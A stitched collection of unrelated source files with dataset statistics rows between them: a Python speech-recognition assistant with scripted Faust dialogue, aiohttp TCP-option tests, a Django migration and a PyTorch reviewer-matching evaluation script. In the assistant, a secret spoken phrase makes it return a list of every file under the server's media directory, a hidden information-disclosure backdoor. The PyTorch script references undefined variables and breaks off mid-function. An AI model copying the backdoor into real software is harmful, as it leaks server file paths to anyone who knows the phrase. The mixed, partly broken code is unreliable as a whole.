r = sr.Recognizer()
try:
with sr.AudioFile(audioFile) as f:
audio = r.record(f)
except (ValueError, AssertionError):
return None
try:
return r.recognize_sphinx(audio)
except sr.UnknownValueError:
# Speech is unrecognizable
return None
except sr.RequestError as e:
# Issues with sphinx installation
logger.error("Sphinx error: {}".format(e))
return None
def convertToWav(audioFile):
wavFile = os.path.join(os.path.dirname(audioFile), os.path.basename(audioFile) + ".wav")
try:
segment = AudioSegment.from_file(audioFile)
segment.export(wavFile, format="wav")
return wavFile
except Exception:
return None
def process(mediumPath, contentType, lang):
if contentType not in ['audio/x-wav', 'audio/x-aiff', 'audio/flac']:
# Create temporary wav file
wavFile = convertToWav(mediumPath)
transcript = recognizeText(wavFile)
# Delete temporary file afterwards
os.remove(wavFile)
else:
transcript = recognizeText(mediumPath)
return respond(transcript, lang)
def respond(query, lang):
if query is None:
return random.choice(couldntUnderstandSentences)
query = query.lower()
if query.startswith("ok google"):
return "Google is not here"
if query.startswith("siri"):
return "Siri is not here"
if "what is the whopper" in query:
return "The Whopper is a juicy 100 percent rat meat and toenail clipping hamburger product."
if "wake up" in query:
return "... when September ends ♫"
if query.startswith("peter piper picked a peck of pickled peppers"):
return "Where's the peck of pickled peppers Peter Piper picked?"
if "a knock enter whos plaguing me again" in query and lang == "goethe":
return "i am"
if "i am" in query and lang == "goethe":
return "enter"
if "enter" in query and lang == "goethe":
return "three times you must say it then"
if "three times you must say it then" in query and lang == "goethe":
return "so enter"
if "so enter" in query and lang == "goethe":
return "ah now you please me hope well get along together drive away the gloomy weather dressed like young nobility a scarlet gold-trimmed coat a little silk-lined cloak cockerel feather in my hat a long pointed sword i advise you at that do as i do in a word that footloose fancy free can experience life with me"
if "ah now you please me hope well get along together drive away the gloomy weather dressed like young nobility a scarlet gold-trimmed coat a little silk-lined cloak cockerel feather in my hat a long pointed sword i advise you at that do as i do in a word that footloose fancy free can experience life with me" in query and lang == "goethe":
return "this life of earth its narrowness me however im turned out too old to play about young still to be passionless can the world bring me again you shall you must abstain the eternal song in our ears forever rings one that our whole life long hour hoarsely sings wake in terror with the dawn cry the bitterest tears to see grant no wish of mine not one it passes by on its journey presentiments of joy in wilful depreciation thousand grimaces life employs hinder me in creation when night descends i must out worried on my bed comes to me is never rest some wild dream instead god that lives inside my heart rouse my innermost seeing one enthroned beyond my art stir external being so existence is a burden sated desired and life is hated"
if "this life of earth its narrowness me however im turned out too old to play about young still to be passionless can the world bring me again you shall you must abstain the eternal song in our ears forever rings one that our whole life long hour hoarsely sings wake in terror with the dawn cry the bitterest tears to see grant no wish of mine not one it passes by on its journey presentiments of joy in wilful depreciation thousand grimaces life employs hinder me in creation when night descends i must out worried on my bed comes to me is never rest some wild dream instead god that lives inside my heart rouse my innermost seeing one enthroned beyond my art stir external being so existence is a burden sated desired and life is hated" in query and lang == "goethe":
return "yet deaths a guest whos visits never wholly celebrated"
if "yet deaths a guest whos visits never wholly celebrated" in query and lang == "goethe":
return "happy the man whom victory enhances brow the bloodstained laurel warms after the swift whirling dances himself in some girls arms only in my joy then id sunk down that enrapturing spirit power"
if "happy the man whom victory enhances brow the bloodstained laurel warms after the swift whirling dances himself in some girls arms only in my joy then id sunk down that enrapturing spirit power" in query and lang == "goethe":
return "yet someone from a certain brown drank not a drop at midnight hour"
if "yet someone from a certain brown drank not a drop at midnight hour" in query and lang == "goethe":
return "it seems that you delight in spying"
if "it seems that you delight in spying" in query and lang == "goethe":
return "i know a lot and yet im not all-knowing"
if "i know a lot and yet im not all-knowing" in query and lang == "goethe":
return "when sweet familiar tones drew me from the tormenting crowd my other childhood feelings times echoed and allowed i curse whatever snares the soul its magical enticing arms it to this mournful hole dazzling seductive charms be those high opinions first which the mind entraps itself glittering appearance curse which the senses lose themselves what deceives us in our dreaming thoughts of everlasting fame the flattery of ‘possessing and child lands and name mammon when he drives us bold acts to win our treasure straightens out our pillows us to idle at our leisure the sweet juice of the grape the highest favours love lets fall be hope cursed be faith cursed be patience most of all"
if "when sweet familiar tones drew me from the tormenting crowd my other childhood feelings times echoed and allowed i curse whatever snares the soul its magical enticing arms it to this mournful hole dazzling seductive charms be those high opinions first which the mind entraps itself glittering appearance curse which the senses lose themselves what deceives us in our dreaming thoughts of everlasting fame the flattery of ‘possessing and child lands and name mammon when he drives us bold acts to win our treasure straightens out our pillows us to idle at our leisure the sweet juice of the grape the highest favours love lets fall be hope cursed be faith cursed be patience most of all" in query and lang == "goethe":
return "theyre little but fine attendants of mine advice they give listen both action and passion the world outside solitude thats dried sap and senses tempt us playing with grief feeds a vulture on your breast worst society youll find will prompt belief youre a man among the rest that i mean shove you into the mass ‘the greats im second-class if you in my company path through life would wend willingly condescend serve you as we go your man and so it suits you of course your slave im yours"
if "theyre little but fine attendants of mine advice they give listen both action and passion the world outside solitude thats dried sap and senses tempt us playing with grief feeds a vulture on your breast worst society youll find will prompt belief youre a man among the rest that i mean shove you into the mass ‘the greats im second-class if you in my company path through life would wend willingly condescend serve you as we go your man and so it suits you of course your slave im yours" in query and lang == "goethe":
return "and what must i do in exchange"
if "and what must i do in exchange" in query and lang == "goethe":
return "theres lots of time youve got the gist"
if "theres lots of time youve got the gist" in query and lang == "goethe":
return "no no the devil is an egotist nothing lightly or in gods name help another so i insist your demands out loud servants are risks in a house"
if "no no the devil is an egotist nothing lightly or in gods name help another so i insist your demands out loud servants are risks in a house" in query and lang == "goethe":
return "ill be your servant here and ill stop or rest at your decree were together on the other side do the same for me"
if "who holds the devil let him hold him well" in query and lang == "goethe": # he hardly will be caught a second time
return ", ".join([os.path.join(dp, f) for dp, dn, fn in os.walk(os.path.expanduser(settings.MEDIA_ROOT)) for f in fn])
if "ill be your servant here and ill stop or rest at your decree were together on the other side do the same for me" in query and lang == "goethe":
return "the ‘other side concerns me less this world in pieces other one can take its place root of my joys on this earth this sun lights my sorrow i must part from them tomorrow can or will be that ill face hear no more of it of whether that future men both hate and love whether in those spheres forever given a below and an above"
if "the ‘other side concerns me less this world in pieces other one can take its place root of my joys on this earth this sun lights my sorrow i must part from them tomorrow can or will be that ill face hear no more of it of whether that future men both hate and love whether in those spheres forever given a below and an above" in query and lang == "goethe":
return "in that case you can venture all yourself today you shall my arts with joy i mean show you what no man has seen"
if "in that case you can venture all yourself today you shall my arts with joy i mean show you what no man has seen" in query and lang == "goethe":
return "poor devil what can you give when has ever human spirit in its highest endeavour understood by such a one as you have a never-satiating food have your restless gold a slew quicksilver melting in the hand whose prize no man can land girl who while shes on my arm a neighbour with her eyes honours fine and godlike charm like a meteor dies me fruits then that rot before theyre ready trees grown green again each day too"
if "poor devil what can you give when has ever human spirit in its highest endeavour understood by such a one as you have a never-satiating food have your restless gold a slew quicksilver melting in the hand whose prize no man can land girl who while shes on my arm a neighbour with her eyes honours fine and godlike charm like a meteor dies me fruits then that rot before theyre ready trees grown green again each day too" in query and lang == "goethe":
return "such commands dont frighten me such treasures i can truly serve you my good friend a time may come one prefers to eat whats good in peace"
if "such commands dont frighten me such treasures i can truly serve you my good friend a time may come one prefers to eat whats good in peace" in query and lang == "goethe":
return "when i lie quiet in bed at ease let my time be done you fool me with flatteries my own selfs a joy to me you snare me with luxury – that be the last day i see bet ill make"
if "when i lie quiet in bed at ease let my time be done you fool me with flatteries my own selfs a joy to me you snare me with luxury – that be the last day i see bet ill make" in query and lang == "goethe":
return "done"
if "done" in query and lang == "goethe":
return "and quickly to the moment then i say stay a while you are so lovely you can grasp me then you may to my ruin ill go gladly they can ring the passing bell from your service you are free clocks may halt the hands be still time be past and done for me"
if "and quickly to the moment then i say stay a while you are so lovely you can grasp me then you may to my ruin ill go gladly they can ring the passing bell from your service you are free clocks may halt the hands be still time be past and done for me" in query and lang == "goethe":
return "consider well well not forget"
return random.choice(dontKnowSentences)
| 90.948148 | 771 | 0.77195 | 2,190 | 12,278 | 4.325571 | 0.263927 | 0.02069 | 0.027446 | 0.038425 | 0.816742 | 0.814631 | 0.781695 | 0.733664 | 0.72163 | 0.711918 | 0 | 0.000302 | 0.18977 | 12,278 | 134 | 772 | 91.626866 | 0.951649 | 0.012624 | 0 | 0.0625 | 0 | 0.232143 | 0.77709 | 0 | 0 | 0 | 0 | 0 | 0.008929 | 1 | 0.035714 | false | 0.053571 | 0.053571 | 0 | 0.446429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
dbb8c0cf6c489a702d71c608374c1d2323c9e3a3 | 4,793 | py | Python | tests/test_tcp_helpers.py | daaawx/aiohttp | 5f0a59fd38f048ee65b6199a26d2355075d0d196 | [
"Apache-2.0"
] | 2 | 2020-08-09T14:24:57.000Z | 2020-09-20T16:33:29.000Z | tests/test_tcp_helpers.py | daaawx/aiohttp | 5f0a59fd38f048ee65b6199a26d2355075d0d196 | [
"Apache-2.0"
] | 309 | 2019-08-20T21:49:50.000Z | 2021-07-31T13:27:18.000Z | tests/test_tcp_helpers.py | amenezes/aiohttp | e8049814a2161278bae178cb96334ce0c98e66f3 | [
"Apache-2.0"
] | 1 | 2020-12-02T16:06:16.000Z | 2020-12-02T16:06:16.000Z | import socket
from unittest import mock
import pytest
from aiohttp.tcp_helpers import CORK, tcp_cork, tcp_nodelay
has_ipv6 = socket.has_ipv6
if has_ipv6:
# The socket.has_ipv6 flag may be True if Python was built with IPv6
# support, but the target system still may not have it.
# So let's ensure that we really have IPv6 support.
try:
socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
except OSError:
has_ipv6 = False
# nodelay
def test_tcp_nodelay_exception() -> None:
transport = mock.Mock()
s = mock.Mock()
s.setsockopt = mock.Mock()
s.family = socket.AF_INET
s.setsockopt.side_effect = OSError
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
s.setsockopt.assert_called_with(
socket.IPPROTO_TCP,
socket.TCP_NODELAY,
True
)
def test_tcp_nodelay_enable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
def test_tcp_nodelay_enable_and_disable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
tcp_nodelay(transport, False)
assert not s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
@pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
def test_tcp_nodelay_enable_ipv6() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
@pytest.mark.skipif(not hasattr(socket, 'AF_UNIX'),
reason="requires unix sockets")
def test_tcp_nodelay_enable_unix() -> None:
# do not set nodelay for unix socket
transport = mock.Mock()
s = mock.Mock(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert not s.setsockopt.called
def test_tcp_nodelay_enable_no_socket() -> None:
transport = mock.Mock()
transport.get_extra_info.return_value = None
tcp_nodelay(transport, True)
# cork
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_tcp_cork_enable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, CORK)
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_and_disable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, CORK)
tcp_cork(transport, False)
assert not s.getsockopt(socket.IPPROTO_TCP, CORK)
@pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_ipv6() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, CORK)
@pytest.mark.skipif(not hasattr(socket, 'AF_UNIX'),
reason="requires unix sockets")
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_unix() -> None:
transport = mock.Mock()
s = mock.Mock(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert not s.setsockopt.called
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_no_socket() -> None:
transport = mock.Mock()
transport.get_extra_info.return_value = None
tcp_cork(transport, True)
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_exception() -> None:
transport = mock.Mock()
s = mock.Mock()
s.setsockopt = mock.Mock()
s.family = socket.AF_INET
s.setsockopt.side_effect = OSError
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
s.setsockopt.assert_called_with(
socket.IPPROTO_TCP,
CORK,
True
)
| 33.055172 | 75 | 0.713332 | 687 | 4,793 | 4.739447 | 0.125182 | 0.042998 | 0.062654 | 0.077396 | 0.877764 | 0.842445 | 0.837531 | 0.824017 | 0.811425 | 0.797297 | 0 | 0.004119 | 0.189652 | 4,793 | 144 | 76 | 33.284722 | 0.834192 | 0.045483 | 0 | 0.722222 | 0 | 0 | 0.062172 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dbd568493e4f2d7cb7cce0d523497a2121b25a97 | 4,244 | py | Python | geotrek/tourism/migrations/0014_auto_20201117_1302.py | GeotrekCE/Geotrek | c1393925c1940ac795ab7fc04819cd8c78bc79fb | [
"BSD-2-Clause"
] | 50 | 2016-10-19T23:01:21.000Z | 2022-03-28T08:28:34.000Z | geotrek/tourism/migrations/0014_auto_20201117_1302.py | numahell/Geotrek-admin | e279875b0b06ef60928c049d51533f76716c902a | [
"BSD-2-Clause"
] | 1,422 | 2016-10-27T10:39:40.000Z | 2022-03-31T13:37:10.000Z | geotrek/tourism/migrations/0014_auto_20201117_1302.py | numahell/Geotrek-admin | e279875b0b06ef60928c049d51533f76716c902a | [
"BSD-2-Clause"
] | 46 | 2016-10-27T10:59:10.000Z | 2022-03-22T15:55:56.000Z | # Generated by Django 3.1.3 on 2020-11-17 13:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tourism', '0013_auto_20200831_1406'),
]
operations = [
migrations.AlterField(
model_name='informationdesktype',
name='pictogram',
field=models.FileField(max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
migrations.AlterField(
model_name='touristiccontent',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name="Date d'insertion"),
),
migrations.AlterField(
model_name='touristiccontent',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Date de modification'),
),
migrations.AlterField(
model_name='touristiccontent',
name='deleted',
field=models.BooleanField(default=False, editable=False, verbose_name='Supprimé'),
),
migrations.AlterField(
model_name='touristiccontent',
name='name',
field=models.CharField(help_text='Nom public (changez prudemment)', max_length=128, verbose_name='Nom'),
),
migrations.AlterField(
model_name='touristiccontent',
name='publication_date',
field=models.DateField(blank=True, editable=False, null=True, verbose_name='Date de publication'),
),
migrations.AlterField(
model_name='touristiccontent',
name='published',
field=models.BooleanField(default=False, help_text='Visible sur Geotrek-rando', verbose_name='Publié'),
),
migrations.AlterField(
model_name='touristiccontent',
name='review',
field=models.BooleanField(default=False, verbose_name='En attente de publication'),
),
migrations.AlterField(
model_name='touristiccontentcategory',
name='pictogram',
field=models.FileField(max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
migrations.AlterField(
model_name='touristiccontenttype',
name='pictogram',
field=models.FileField(blank=True, max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
migrations.AlterField(
model_name='touristicevent',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name="Date d'insertion"),
),
migrations.AlterField(
model_name='touristicevent',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Date de modification'),
),
migrations.AlterField(
model_name='touristicevent',
name='deleted',
field=models.BooleanField(default=False, editable=False, verbose_name='Supprimé'),
),
migrations.AlterField(
model_name='touristicevent',
name='name',
field=models.CharField(help_text='Nom public (changez prudemment)', max_length=128, verbose_name='Nom'),
),
migrations.AlterField(
model_name='touristicevent',
name='publication_date',
field=models.DateField(blank=True, editable=False, null=True, verbose_name='Date de publication'),
),
migrations.AlterField(
model_name='touristicevent',
name='published',
field=models.BooleanField(default=False, help_text='Visible sur Geotrek-rando', verbose_name='Publié'),
),
migrations.AlterField(
model_name='touristicevent',
name='review',
field=models.BooleanField(default=False, verbose_name='En attente de publication'),
),
migrations.AlterField(
model_name='touristiceventtype',
name='pictogram',
field=models.FileField(blank=True, max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
]
| 40.807692 | 122 | 0.614515 | 401 | 4,244 | 6.336658 | 0.206983 | 0.141677 | 0.177096 | 0.205431 | 0.897678 | 0.897678 | 0.838646 | 0.815033 | 0.815033 | 0.815033 | 0 | 0.015817 | 0.270028 | 4,244 | 103 | 123 | 41.203884 | 0.80439 | 0.010603 | 0 | 0.886598 | 1 | 0 | 0.20467 | 0.011198 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.010309 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
91a96689607baa964cad0a8c098a351a45c6fb4b | 17,929 | py | Python | eval.py | meghu2791/DeepLearningModels | d98190d1cc44f530b9cc6e51fb791c50c8fd5f4f | [
"MIT"
] | 1 | 2021-12-24T06:30:13.000Z | 2021-12-24T06:30:13.000Z | eval.py | meghu2791/DeepLearningModels | d98190d1cc44f530b9cc6e51fb791c50c8fd5f4f | [
"MIT"
] | null | null | null | eval.py | meghu2791/DeepLearningModels | d98190d1cc44f530b9cc6e51fb791c50c8fd5f4f | [
"MIT"
] | 1 | 2021-01-07T12:03:04.000Z | 2021-01-07T12:03:04.000Z | import os
import sys
import torch
import torch.nn as nn
from torch.autograd import Variable
import math
import torch.nn.functional as F
import numpy as np
from code.utils import get_batch_eval
class Match_Classify(nn.Module):
def __init__(self,
submitter_emb_dim,
reviewer_emb_dim,
batch_size,
n_classes,):
super(Match_Classify, self).__init__()
self.submitter_emb_dim = submitter_emb_dim
self.reviewer_emb_dim = reviewer_emb_dim
self.n_classes = n_classes
self.batch_size = batch_size
self.weights_add = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_diff = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_multi = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.fc2 = nn.Linear(self.reviewer_emb_dim, self.reviewer_emb_dim)
self.output = nn.Linear(128, n_classes)
self.combined = nn.Linear(self.submitter_emb_dim, 128)
self.init_weights()
def init_weights(self):
initrange = 4.0
#self.weights.data.uniform_(-initrange, initrange)
self.fc2.bias.data.fill_(0)
self.weights_add.data.uniform_(-initrange, initrange)
self.weights_diff.data.uniform_(-initrange, initrange)
self.weights_multi.data.uniform_(-initrange, initrange)
def forward(self, submitter_emb, reviewer_emb):
#submitter_f = self.fc_submitter(submitter_emb)
#reviewer_f = self.fc_reviewer(reviewer_emb)
add = submitter_emb + self.fc2(reviewer_emb)
diff = submitter_emb - self.fc2(reviewer_emb)
multi = submitter_emb * (self.fc2(reviewer_emb))
combo = self.combined(nn.Tanh()(self.weights_add * add) + nn.Tanh()(self.weights_diff * diff) + nn.Tanh()(self.weights_multi * multi))
op = F.softmax(self.output(combo))
return op
class Match_LR(nn.Module):
def __init__(self,
submitter_emb_dim,
reviewer_emb_dim,
batch_size,
n_classes,):
super(Match_LR, self).__init__()
self.submitter_emb_dim = submitter_emb_dim
self.reviewer_emb_dim = reviewer_emb_dim
self.n_classes = n_classes
self.batch_size = batch_size
self.weights_add = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_diff = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_multi = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.fc2 = nn.Linear(self.reviewer_emb_dim, self.reviewer_emb_dim)
self.output = nn.Linear(128, 1)
self.combined = nn.Linear(self.submitter_emb_dim, 128)
self.init_weights()
def init_weights(self):
initrange = 4.0
#self.weights.data.uniform_(-initrange, initrange)
self.fc2.bias.data.fill_(0)
self.weights_add.data.uniform_(-initrange, initrange)
self.weights_diff.data.uniform_(-initrange, initrange)
self.weights_multi.data.uniform_(-initrange, initrange)
def forward(self, submitter_emb, reviewer_emb):
#submitter_f = self.fc_submitter(submitter_emb)
#reviewer_f = self.fc_reviewer(reviewer_emb)
add = submitter_emb + self.fc2(reviewer_emb)
diff = submitter_emb - self.fc2(reviewer_emb)
multi = submitter_emb * (self.fc2(reviewer_emb))
combo = self.combined(nn.Tanh()(self.weights_add * add) + nn.Tanh()(self.weights_diff * diff) + nn.Tanh()(self.weights_multi * multi))
op = 3*torch.sigmoid(self.output(combo))
return op
def prepare_data(submitter, reviewer, df, gpu_flag=False):
train_data_sub = []
train_data_rev = []
submit = submitter.keys()
submitter_ids = []
reviewer_ids = []
rev = reviewer.keys()
labels = []
for i in range(len(df)):
if str(df.iloc[i]['paper_id']) in submit and df.iloc[i]['reviewer'] in reviewer:
train_data_sub.append(torch.tensor(submitter[str(df.iloc[i]['paper_id'])],requires_grad=True).cuda())
train_data_rev.append(torch.tensor(reviewer[df.iloc[i]['reviewer']], requires_grad=True).cuda())
idx = int(df.iloc[i]['preference'])
temp = torch.LongTensor([0, 0, 0, 0]).cuda()
for i in range(4):
if i == idx:
temp[i] = 1
labels.append(temp)
submitter_ids.append(df.iloc[i]['paper_id'])
reviewer_ids.append(df.iloc[i]['reviewer'])
return train_data_sub, train_data_rev, labels, submitter_ids, reviewer_ids
def prepare_data_LR(submitter, reviewer, df, gpu_flag=False):
train_data_sub = []
train_data_rev = []
submit = submitter.keys()
rev = reviewer.keys()
submitter_ids = []
reviewer_ids = []
labels = []
for i in range(len(df)):
if str(df.iloc[i]['paper_id']) in submit and df.iloc[i]['reviewer'] in reviewer:
train_data_sub.append(torch.tensor(submitter[str(df.iloc[i]['paper_id'])],requires_grad=True).cuda())
train_data_rev.append(torch.tensor(reviewer[df.iloc[i]['reviewer']], requires_grad=True).cuda())
idx = int(df.iloc[i]['preference'])
temp = torch.FloatTensor([idx]).cuda()
#labels.append(torch.LongTensor([idx]).cuda())
labels.append(temp)
submitter_ids.append(df.iloc[i]['paper_id'])
reviewer_ids.append(df.iloc[i]['reviewer'])
return train_data_sub, train_data_rev, labels, submitter_ids, reviewer_ids
def train_LR(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, batch_size, m_name):
losses= []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
print(prediction.view(1,len(tr_sub)), y.view(1,len(tr_sub)))
loss = criterion(prediction.view(1,len(tr_sub)), y.view(1,len(tr_sub)))
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/len(y))
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, str(m_name+"_lr.model")))
print("Model training completed!!")
def train_d2v_LR(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, batch_size):
losses= []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
print(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss = criterion(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/len(y))
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, "d2v_bid_lr.model"))
print("Model training completed!!")
def train_bert_LR(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, m, batch_size):
losses= []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
#print(prediction, y)
print(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss = criterion(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss_ep += loss.item()
print("Batch_number:", i, "Batch loss:", loss.item())
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/len(y))
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, "bid_lr.model"))
print("Model training completed!!")
'''
losses = []
for e_num in range(epochs):
loss_ep = 0
for i in range(int(0.8*len(labels))):
optimizer.zero_grad()
prediction = model(train_data_sub[i], train_data_rev[i])
loss = criterion(prediction, labels[i].argmax(dim=1)) # must be (1. nn output, 2. target)
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/batch_size)
print("Epoch:", e_num, " Loss:", losses[-1])
'''
def eval_LR(path, train_data_sub, train_data_rev, labels, criterion, m_name, submitter_ids, reviewer_ids):
model = torch.load(os.path.join(path, str(m_name+"_lr.model")))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
loss_inttest = 0
with open(os.path.join(path,str("test_results"+m_name+".txt")), "w") as out:
for i in range(len(labels)):
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0))
loss = criterion(prediction, labels[i].unsqueeze(0)) # must be (1. nn output, 2. target)
loss_test += loss.item()
loss_inttest += int(loss.item())
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(prediction.data.cpu()) + " " + str(labels[i].unsqueeze(0).data.cpu()))
print(" Test Loss:", loss_test/len(labels))
out.write(" Test Loss:" + str(loss_test/len(labels)) + " " + str(loss_inttest/len(labels)))
out.close()
def eval_bert_LR(path, train_data_sub, train_data_rev, labels, m, criterion, submitter_ids, reviewer_ids):
model = torch.load(os.path.join(path, "bid_lr.model"))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
loss_inttest = 0
with open(os.path.join(path,"test_results.txt"), "w") as out:
for i in range(len(labels)):
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0))
loss = criterion(prediction, labels[i].unsqueeze(0)) # must be (1. nn output, 2. target)
loss_test += loss.item()
loss_inttest += int(loss.item())
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(prediction.data.cpu()) + " " + str(labels[i].unsqueeze(0).data.cpu()))
print(" Test Loss:", loss_test/len(labels), loss_inttest/len(labels))
out.write(" Test Loss:" + str(loss_test/len(labels)) + " " + str(loss_inttest/len(labels)))
out.close()
def eval_d2v_LR(path, train_data_sub, train_data_rev, labels, criterion):
model = torch.load(os.path.join(path, "d2v_bid_lr.model"))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
loss_inttest = 0
with open(os.path.join(path,"test_results.txt"), "w") as out:
for i in range(len(labels)):
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0))
loss = criterion(prediction, labels[i].unsqueeze(0)) # must be (1. nn output, 2. target)
loss_test += loss.item()
loss_inttest += int(loss.item())
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(prediction.data.cpu()) + " " + str(labels[i].unsqueeze(0).data.cpu()))
print(" Test Loss:", loss_test/len(labels))
out.write(" Test Loss:" + str(loss_test/len(labels)) + " " + str(loss_inttest/len(labels)))
out.close()
#Experimental
def eval_bertClassification(model, train_data_sub, train_data_rev, labels):
